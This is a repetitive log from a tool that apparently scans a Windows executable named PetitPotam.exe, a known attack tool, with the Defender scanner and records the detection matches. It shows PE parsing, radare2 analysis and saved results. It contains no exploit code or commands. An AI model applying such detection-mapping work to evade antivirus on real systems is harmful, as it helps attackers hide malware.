[WARNING ][2023-09-25 18:22:55,404] parsePeRegions() :: Data Directory Section 14 has address 0, skipping
[WARNING ][2023-09-25 18:22:55,404] parsePeRegions() :: Data Directory Section 15 has address 0, skipping
[WARNING ][2023-09-25 18:22:55,427] handleFile() :: Using scanner as defined in outcome: defender
[INFO    ][2023-09-25 18:22:55,428] saveToFile() :: Saving results to: app/examples/D3363A09CA1AA83F.PetitPotam.exe.outcome
[INFO    ][2023-09-25 18:22:55,443] load() :: Loading HashCache
[INFO    ][2023-09-25 18:22:55,579] load() ::   101712 hashes loaded
[INFO    ][2023-09-25 18:22:55,579] save() :: Saving HashCache (101712)
[INFO    ][2023-09-25 18:22:55,675] augmentFile() :: Perform augmentation of matches
[INFO    ][2023-09-25 18:22:55,675] augmentFilePe() :: Augment: File PE
[INFO    ][2023-09-25 18:22:55,835] augmentFilePe() :: R2: Analyze
[INFO    ][2023-09-25 18:22:57,070] init() :: R2: Get all strings
[INFO    ][2023-09-25 18:22:57,085] augmentFilePe() :: Augment: Matches
[INFO    ][2023-09-25 18:22:57,943] saveToFile() :: Saving results to: app/examples/D3363A09CA1AA83F.PetitPotam.exe.outcome
[INFO    ][2023-09-25 18:22:57,958] save() :: Saving HashCache (101712)
[INFO    ][2023-09-29 10:08:24,538] main() :: Using file: app/examples/D3363A09CA1AA83F.PetitPotam.exe
[INFO    ][2023-09-29 10:08:24,538] handleFile() :: Handle file: app/examples/D3363A09CA1AA83F.PetitPotam.exe
[INFO    ][2023-09-29 10:08:24,539] handleFile() :: Using parser for file type EXE
[INFO    ][2023-09-29 10:08:24,539] parseFile() :: FilePe: Parse File
[INFO    ][2023-09-29 10:08:24,557] parsePeSections() :: FilePe: Parse PE Sections
[INFO    ][2023-09-29 10:08:24,557] parsePeRegions() :: FilePe: Parse PE Regions
[WARNING ][2023-09-29 10:08:24,557] parsePeRegions() :: Data Directory Section 0 has address 0, skipping
[WARNING ][2023-09-29 10:08:24,557] parsePeRegions() :: Data Directory Section 3 has address 0, skipping
[WARNING ][2023-09-29 10:08:24,557] parsePeRegions() :: Data Directory Section 4 has address 0, skipping
[WARNING ][2023-09-29 10:08:24,557] parsePeRegions() :: Data Directory Section 7 has address 0, skipping
[WARNING ][2023-09-29 10:08:24,557] parsePeRegions() :: Data Directory Section 8 has address 0, skipping
[WARNING ][2023-09-29 10:08:24,557] parsePeRegions() :: Data Directory Section 9 has address 0, skipping
[WARNING ][2023-09-29 10:08:24,557] parsePeRegions() :: Data Directory Section 11 has address 0, skipping
[WARNING ][2023-09-29 10:08:24,557] parsePeRegions() :: Data Directory Section 13 has address 0, skipping
[WARNING ][2023-09-29 10:08:24,558] parsePeRegions() :: Data Directory Section 14 has address 0, skipping
[WARNING ][2023-09-29 10:08:24,558] parsePeRegions() :: Data Directory Section 15 has address 0, skipping
[WARNING ][2023-09-29 10:08:24,581] handleFile() :: Using scanner as defined in outcome: defender
[INFO    ][2023-09-29 10:08:24,582] saveToFile() :: Saving results to: app/examples/D3363A09CA1AA83F.PetitPotam.exe.outcome
[INFO    ][2023-09-29 10:08:24,597] load() :: Loading HashCache
[INFO    ][2023-09-29 10:08:24,737] load() ::   102070 hashes loaded
[INFO    ][2023-09-29 10:08:24,738] save() :: Saving HashCache (102070)
[INFO    ][2023-09-29 10:08:24,836] augmentFile() :: Perform augmentation of matches
[INFO    ][2023-09-29 10:08:24,836] augmentFilePe() :: Augment: File PE
[INFO    ][2023-09-29 10:08:24,996] augmentFilePe() :: R2: Analyze
[INFO    ][2023-09-29 10:08:26,239] init() :: R2: Get all strings
[INFO    ][2023-09-29 10:08:26,255] augmentFilePe() :: Augment: Matches
[INFO    ][2023-09-29 10:08:27,115] saveToFile() :: Saving results to: app/examples/D3363A09CA1AA83F.PetitPotam.exe.outcome
[INFO    ][2023-09-29 10:08:27,131] save() :: Saving HashCache (102070)
[INFO    ][2023-09-29 12:12:57,963] main() :: Using file: app/examples/D3363A09CA1AA83F.PetitPotam.exe
[INFO    ][2023-09-29 12:12:57,964] handleFile() :: Handle file: app/examples/D3363A09CA1AA83F.PetitPotam.exe
[INFO    ][2023-09-29 12:12:57,965] handleFile() :: Using parser for file type EXE
[INFO    ][2023-09-29 12:12:57,965] parseFile() :: FilePe: Parse File
[INFO    ][2023-09-29 12:12:57,983] parsePeSections() :: FilePe: Parse PE Sections
[INFO    ][2023-09-29 12:12:57,983] parsePeRegions() :: FilePe: Parse PE Regions
[WARNING ][2023-09-29 12:12:57,983] parsePeRegions() :: Data Directory Section 0 has address 0, skipping
[WARNING ][2023-09-29 12:12:57,983] parsePeRegions() :: Data Directory Section 3 has address 0, skipping
[WARNING ][2023-09-29 12:12:57,983] parsePeRegions() :: Data Directory Section 4 has address 0, skipping
[WARNING ][2023-09-29 12:12:57,983] parsePeRegions() :: Data Directory Section 7 has address 0, skipping
[WARNING ][2023-09-29 12:12:57,983] parsePeRegions() :: Data Directory Section 8 has address 0, skipping
[WARNING ][2023-09-29 12:12:57,983] parsePeRegions() :: Data Directory Section 9 has address 0, skipping
[WARNING ][2023-09-29 12:12:57,983] parsePeRegions() :: Data Directory Section 11 has address 0, skipping
[WARNING ][2023-09-29 12:12:57,983] parsePeRegions() :: Data Directory Section 13 has address 0, skipping
[WARNING ][2023-09-29 12:12:57,983] parsePeRegions() :: Data Directory Section 14 has address 0, skipping
[WARNING ][2023-09-29 12:12:57,983] parsePeRegions() :: Data Directory Section 15 has address 0, skipping
[WARNING ][2023-09-29 12:12:58,007] handleFile() :: Using scanner as defined in outcome: defender
[INFO    ][2023-09-29 12:12:58,008] saveToFile() :: Saving results to: app/examples/D3363A09CA1AA83F.PetitPotam.exe.outcome
[INFO    ][2023-09-29 12:12:58,024] load() :: Loading HashCache
[INFO    ][2023-09-29 12:12:58,165] load() ::   102070 hashes loaded
[INFO    ][2023-09-29 12:12:58,166] save() :: Saving HashCache (102070)
[INFO    ][2023-09-29 12:12:58,263] augmentFile() :: Perform augmentation of matches
[INFO    ][2023-09-29 12:12:58,263] augmentFilePe() :: Augment: File PE
[INFO    ][2023-09-29 12:12:58,425] augmentFilePe() :: R2: Analyze
[INFO    ][2023-09-29 12:12:59,660] init() :: R2: Get all strings
[INFO    ][2023-09-29 12:12:59,676] augmentFilePe() :: Augment: Matches
[INFO    ][2023-09-29 12:13:00,540] saveToFile() :: Saving results to: app/examples/D3363A09CA1AA83F.PetitPotam.exe.outcome
[INFO    ][2023-09-29 12:13:00,556] save() :: Saving HashCache (102070)
[INFO    ][2023-09-30 10:33:52,733] main() :: Using file: app/examples/D3363A09CA1AA83F.PetitPotam.exe
[INFO    ][2023-09-30 10:33:52,733] handleFile() :: Handle file: app/examples/D3363A09CA1AA83F.PetitPotam.exe
[INFO    ][2023-09-30 10:33:52,734] handleFile() :: Using parser for file type EXE
[INFO    ][2023-09-30 10:33:52,734] parseFile() :: FilePe: Parse File
[INFO    ][2023-09-30 10:33:52,752] parsePeSections() :: FilePe: Parse PE Sections
[INFO    ][2023-09-30 10:33:52,752] parsePeRegions() :: FilePe: Parse PE Regions
[WARNING ][2023-09-30 10:33:52,752] parsePeRegions() :: Data Directory Section 0 has address 0, skipping
[WARNING ][2023-09-30 10:33:52,752] parsePeRegions() :: Data Directory Section 3 has address 0, skipping
[WARNING ][2023-09-30 10:33:52,752] parsePeRegions() :: Data Directory Section 4 has address 0, skipping
[WARNING ][2023-09-30 10:33:52,752] parsePeRegions() :: Data Directory Section 7 has address 0, skipping
[WARNING ][2023-09-30 10:33:52,752] parsePeRegions() :: Data Directory Section 8 has address 0, skipping
[WARNING ][2023-09-30 10:33:52,752] parsePeRegions() :: Data Directory Section 9 has address 0, skipping
[WARNING ][2023-09-30 10:33:52,752] parsePeRegions() :: Data Directory Section 11 has address 0, skipping
[WARNING ][2023-09-30 10:33:52,752] parsePeRegions() :: Data Directory Section 13 has address 0, skipping
[WARNING ][2023-09-30 10:33:52,752] parsePeRegions() :: Data Directory Section 14 has address 0, skipping
[WARNING ][2023-09-30 10:33:52,753] parsePeRegions() :: Data Directory Section 15 has address 0, skipping
[WARNING ][2023-09-30 10:33:52,776] handleFile() :: Using scanner as defined in outcome: defender
[INFO    ][2023-09-30 10:33:52,777] saveToFile() :: Saving results to: app/examples/D3363A09CA1AA83F.PetitPotam.exe.outcome
[INFO    ][2023-09-30 10:33:52,793] load() :: Loading HashCache
[INFO    ][2023-09-30 10:33:52,935] load() ::   102072 hashes loaded
[INFO    ][2023-09-30 10:33:52,935] save() :: Saving HashCache (102072)
[INFO    ][2023-09-30 10:33:53,033] augmentFile() :: Perform augmentation of matches
[INFO    ][2023-09-30 10:33:53,033] augmentFilePe() :: Augment: File PE
[INFO    ][2023-09-30 10:33:53,192] augmentFilePe() :: R2: Analyze
[INFO    ][2023-09-30 10:33:54,427] init() :: R2: Get all strings
[INFO    ][2023-09-30 10:33:54,443] augmentFilePe() :: Augment: Matches
[INFO    ][2023-09-30 10:33:55,293] saveToFile() :: Saving results to: app/examples/D3363A09CA1AA83F.PetitPotam.exe.outcome
[INFO    ][2023-09-30 10:33:55,308] save() :: Saving HashCache (102072)